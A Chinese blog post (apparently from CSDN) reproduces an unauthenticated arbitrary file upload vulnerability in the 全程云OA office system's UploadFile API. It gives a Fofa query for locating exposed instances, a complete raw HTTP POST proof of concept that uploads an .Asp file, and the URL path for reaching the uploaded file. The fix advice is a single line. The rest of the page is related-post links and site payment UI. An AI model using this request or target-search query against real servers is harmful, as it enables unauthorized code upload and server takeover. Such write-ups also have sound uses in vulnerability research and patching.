全程云OA UploadFile 任意文件上传

于 2024-08-27 11:51:52 发布
阅读量26 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141599137
版权

0x01 漏洞描述:

全程云OA系统是一款功能强大的协同办公云平台,旨在帮助企业实现高效、便捷的办公管理。在全程云OA系统中,UploadFile接口没有对上传的文件类型、内容等进行严格的安全验证和过滤,导致存在任意文件上传漏洞。

0x02 搜索语句:

Fofa:body="images/yipeoplehover.png"

0x03 漏洞复现:

poc:

POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR
Content-Length: 191

------WebKitFormBoundaryNe8DcVuv1vEUWDaR
Content-Disposition: form-data; name="upload";filename="123.Asp"

<% response.write("hello,world") %>
------WebKitFormBoundaryNe8DcVuv1vEUWDaR--

拼接路径访问文件

http://your-ip/OA/upfiles/temp/文件名.Asp

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
全程OA AttachFile/UploadFile 任意文件上传漏洞复现
0xSec
08-20 75
全程OA AttachFile/UploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
易宝OA_UploadFile接口任意文件上传漏洞
weixin_43567873的博客
03-28 232
易宝OA_UploadFile接口任意文件上传漏洞
易宝OA 两处任意文件上传漏洞复现
0xSec
12-06 1147
易宝OA系统UploadFile​​​​​​​、BasicService.asmx等接口处存在文件上传漏洞,未授权的攻击者可以上传恶意后门程序执行任意代码,获取服务器权限
【漏洞复现】联达OA-UpLoadFile-存在任意文件上传
知黑而守白
03-29 103
联达OA是一款功能强大的协同办公系统,旨在为企业提供高效、便捷的信息化管理解决方案。该系统通过整合企业各类资源,实现信息的快速传递和共享,帮助企业提高工作效率和协同能力。联达OA具备丰富的功能模块,包括公文管理、日程安排、任务分配、项目管理等,满足企业日常办公的多样化需求。同时,该系统支持移动办公,用户可以通过手机随时随地进行工作处理,实现真正的无缝办公体验。总之,联达OA是一款功能全面、操作简便、安全可靠的协同办公系统,能够帮助企业实现信息化管理的升级,提升企业的整体竞争力。
【漏洞复现】易宝OA UploadFile存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 833
易宝OA是一款非常强大的手机办公软件,这里不仅为广大的用户提供了一个更好的工作日历,而且每个人都可以在这里进行重要事项的记录,同时软件中还拥有更好的打卡系统,让用户可以快速记录自己的工作时常,而且调班与补卡也会更加的简单,让你工作活跃度得到提升。易宝OA UploadFile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
enjoyscm UploadFile任意文件上传漏洞
m0_49360718的博客
02-25 544
enjoyscm UploadFile任意文件上传漏洞
【漏洞复现】LiveBOS UploadFile.do 任意文件上传
今天是几号的博客
08-01 574
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
【漏洞复现】联达OA UpLoadFile.aspx 存在任意文件上传漏洞
https://blog.echo234.cn/
03-27 451
联达动力oa是PHPOA推出的新一代OA系统,系统支持性好、安全、数据高速缓存化;支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。该系统存在任意文件上传,攻击者可以上传任意文件控制服务器。
联达动力OA 多处任意文件上传漏洞复现
0xSec
04-04 559
联达动力OA /FileManage/UpLoadFile.aspx、/Hosp_Portal/uploadLogo.aspx、/Dept_Portal/uploadImg.aspx等接口处存在未授权文件上传漏洞,未经身份验证的攻击者可利用该漏洞获取服务器控制权限。
Django实现任意文件上传(最简单的方法)
09-16
在Django框架中实现任意文件上传是一个常见的需求,本文将详细介绍如何通过最简单的方法来实现这一功能。在Django中,文件上传涉及到前端HTML表单、URL配置以及后端视图函数的处理。 首先,我们需要在HTML模板文件...
uploadFile文件上传
08-23
"uploadFile文件上传" 描述的可能是一个专用于处理文件上传的插件或组件,它简化了开发人员在应用程序中集成文件上传功能的过程。下面,我们将深入探讨文件上传的相关知识点。 1. 文件上传原理:文件上传通常涉及到...
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
致远OA上传文件、附件方法
04-02
本篇文章将重点讲解如何在致远OA系统中通过Java代码实现文件上传以及获取附件ID的操作,以便于后续的表单提交。 首先,我们来理解一下“附件ID”。在OA系统中,每个上传的文件都会被赋予一个唯一的ID,这个ID在后续...
网络安全(黑客)——自学2024
2401_84466325的博客
08-25 768
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全教程初级简介
最新发布
网络研究观
08-26 422
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-22 1373
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全售前入门03——审计类产品了解
打工人
08-25 782
为方便初接触网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)文章介绍,希望能给初进网安职场的小伙伴提供一点帮助。仅适合入门小白。
网络安全售前入门01——产品了解
打工人
08-23 581
为方便初入网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)介绍,希望能给初进职场小伙伴提供一点帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值